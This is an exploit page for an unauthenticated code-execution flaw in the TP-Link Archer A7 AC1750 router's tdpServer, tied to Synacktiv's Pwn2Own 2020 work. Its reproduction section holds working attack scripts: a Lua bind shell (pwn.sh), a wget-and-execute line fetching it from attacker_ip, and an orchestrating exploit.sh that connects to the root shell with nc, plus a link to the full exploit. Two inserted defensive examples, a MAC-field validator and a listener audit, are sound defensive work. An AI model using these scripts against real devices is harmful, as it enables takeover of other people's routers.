Vulnerability details

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of the TP-Link Archer A7 AC1750 router. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the handling of MAC addresses by the tdpServer endpoint. A crafted TCP message can write stack pointers to the stack. An attacker can leverage this vulnerability to execute code in the context of the root user.

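The flaw sits in how tdpServer handles the MAC-address field. The following is an added example, not code from this page, from the TP-Link firmware or from the Synacktiv exploit; it shows the defensive pattern a service parsing such a field should apply: bound the field length first, accept only the exact six-octet colon form, and pass the value on as parsed bytes (or as a single argv element) rather than as the raw string. The function names, the 17-byte field length and the `macquery` tool name are assumptions.

```python
import re
from typing import List, Optional

# Added example: strict handling of a MAC-address field before it reaches any
# fixed-size buffer or command line. It assumes (not stated on the page) that the
# field is expected as exactly six colon-separated hex octets, e.g. "aa:bb:cc:dd:ee:ff".
MAC_TEXT_LEN = 17
MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}$")


def parse_mac(field: bytes) -> Optional[bytes]:
    """Return the six raw octets, or None when the field is not a well-formed MAC."""
    # Length check first: a too-long or too-short field is rejected before any
    # parsing, so an oversized or NUL-stuffed value never reaches a routine that
    # copies it into a fixed-size buffer.
    if len(field) != MAC_TEXT_LEN:
        return None
    try:
        text = field.decode("ascii")
    except UnicodeDecodeError:
        return None
    # Format check: only hex digits and colons in the exact six-octet shape
    # survive, which rules out format-string characters, shell metacharacters
    # and alternative separators.
    if MAC_RE.fullmatch(text) is None:
        return None
    return bytes(int(octet, 16) for octet in text.split(":"))


def canonical_mac(octets: bytes) -> str:
    """Re-encode parsed octets as lowercase text; output is built here, never copied from input."""
    return ":".join(f"{b:02x}" for b in octets)


def build_lookup_argv(octets: bytes) -> List[str]:
    """Hypothetical helper: hand the MAC to a tool as one argv element, never via a shell string.
    'macquery' is a placeholder name, not a real binary on the router."""
    return ["macquery", "--mac", canonical_mac(octets)]


if __name__ == "__main__":
    # Constructed inputs: one valid field and three that a strict parser must reject.
    samples = (
        b"AA:BB:CC:DD:EE:FF",          # valid
        b"aa:bb:cc:dd:ee:ff\x00extra",  # NUL-stuffed, over-long
        b"aa-bb-cc-dd-ee-ff",           # right length, wrong separator
        b"\xff" * MAC_TEXT_LEN,         # right length, not ASCII
    )
    for sample in samples:
        print(sample, "->", parse_mac(sample))
```

Rejecting on length before looking at content is deliberate: the cheapest check runs first, and a field that fails it never reaches the decoder, the regex or any downstream buffer.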
Affected products

AC1750

Vulnerability reproduction

We split the exploit code into four files:

- exploit.sh: instantiation of the HTTP server, orchestration of the two exploits, etc.
- tdpwn.py: the many related parts
- tddp.py: exploitation of the command injection discussed earlier;
- pwn.sh: the commands to be executed on the router (e.g. the Lua bind shell)


pwn.sh

```sh
#!/bin/sh
# Lua bind shell: listen on LPORT on every interface, run each received line
# through io.popen and send its output back to the connected client.
export LPORT=12345
lua -e 'local k=require("socket");
  local s=assert(k.bind("*",os.getenv("LPORT")));
  local c=s:accept();
  while true do
    local r,x=c:receive();local f=assert(io.popen(r,"r"));
    local b=assert(f:read("*a"));c:send(b);f:close();
  end;c:close();'
```

The command run on the router to fetch pwn.sh from the HTTP server started by exploit.sh and execute it:

```sh
wget http://attacker_ip:8000/pwn.sh && chmod +x pwn.sh && ./pwn.sh
```



After setting your IP address to 192.168.0.100, run exploit.sh and wait long enough; you should get a reverse shell:

exploit.sh

```bash
#!/bin/bash

# Countdown while the first stage settles on the router
timer () {
      for i in $(seq 80 -10 10)
      do
           echo "$i seconds left..."
           sleep 10
      done
}

# Run both stages: the tdpServer exploit (tdpwn.py), then the tddp command injection
attack_func () {
    echo "[+] "
    python3 tdpwn.py
    echo "    And wait for 80 seconds..."
    timer
    echo "[+] Trying to exploit the tddp injection"
    timeout 2 python3 tddp.py
}

# Stop the HTTP server that serves pwn.sh when the script is interrupted
clean_web() {
    echo "[-] Stopping Webserver, now"
    kill $PIDWEB
    exit 1
}

echo "[+] Launching web server for distribution of pwn.sh"
python3 -m http.server &
PIDWEB=$!    # PID of the background server ($? would only be the status of starting it)
trap clean_web INT
sleep 2

attack_func
echo ""
echo "[+] Trying the root shell (Low probability of success...)"
sleep 5
echo "nc -v 192.168.0.1 12345"
nc -v 192.168.0.1 12345
echo ""
echo "[ ] If the shell hasn't succeeded, don't worry, we retry it"
echo ""
attack_func
echo ""
echo "[+] Trying the root shell (High probability of success...)"
sleep 5
echo "nc -v 192.168.0.1 12345"
nc -v 192.168.0.1 12345

# Shut the HTTP server down on normal completion as well
kill $PIDWEB
```
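Once pwn.sh is running, the router has a Lua process bound to a high port on every interface, and that is what a listener audit on the device should catch. The example below is added here and is not code from this page or from the Synacktiv repository: it parses a constructed `netstat -tlnp`-style listing and flags any listening socket that is outside an expected-port baseline or is owned by an interpreter or shell. The sample lines, the baseline ports and the program names other than lua are assumptions made for the example.

```python
import re
from typing import Dict, List, Set

# Constructed sample in the shape of `netstat -tlnp` output on a small router.
# The lines and program names are made up for this example; only the lua
# listener on 12345 mirrors the bind shell described above.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      512/uhttpd
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      433/dnsmasq
tcp        0      0 0.0.0.0:12345           0.0.0.0:*               LISTEN      917/lua
"""

LISTEN_RE = re.compile(
    r"^tcp6?\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+LISTEN\s+(?P<pid>\d+)/(?P<prog>\S+)"
)

# Assumed baseline: ports this device is expected to serve on.
EXPECTED_PORTS: Set[int] = {53, 80}
# Programs that should never own a listening socket on an appliance.
INTERPRETERS: Set[str] = {"lua", "sh", "ash", "bash", "nc", "python", "python3"}


def find_suspicious_listeners(netstat_text: str,
                              expected_ports: Set[int] = EXPECTED_PORTS) -> List[Dict]:
    """Return one finding per LISTEN socket that is off-baseline or interpreter-owned."""
    findings: List[Dict] = []
    for line in netstat_text.splitlines():
        m = LISTEN_RE.match(line)
        if m is None:          # header line or non-listening socket
            continue
        port = int(m["port"])
        prog = m["prog"].lower()
        reasons: List[str] = []
        if port not in expected_ports:
            reasons.append("port not in expected baseline")
        if prog in INTERPRETERS:
            reasons.append("listener owned by an interpreter/shell")
        # Exposure note, only attached to sockets that are already suspicious,
        # so legitimate services bound on all interfaces are not flagged by it.
        if reasons and m["addr"] in ("0.0.0.0", "::"):
            reasons.append("bound on all interfaces")
        if reasons:
            findings.append({"pid": int(m["pid"]), "prog": prog, "port": port,
                             "addr": m["addr"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_listeners(SAMPLE_NETSTAT):
        print(f"pid {finding['pid']} ({finding['prog']}) on {finding['addr']}:{finding['port']}: "
              + "; ".join(finding["reasons"]))
```

The baseline is kept as a parameter so the same function can be run against a different device's known-good listing; the interpreter check is independent of the baseline, so a bind shell parked on an allowed port is still reported.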


Download: https://github.com/synacktiv/CVE-2021-27246_Pwn2Own2020

Reference: https://www.synacktiv.com/publications/pwn2own-tokyo-2020-defeating-the-tp-link-ac1750.html#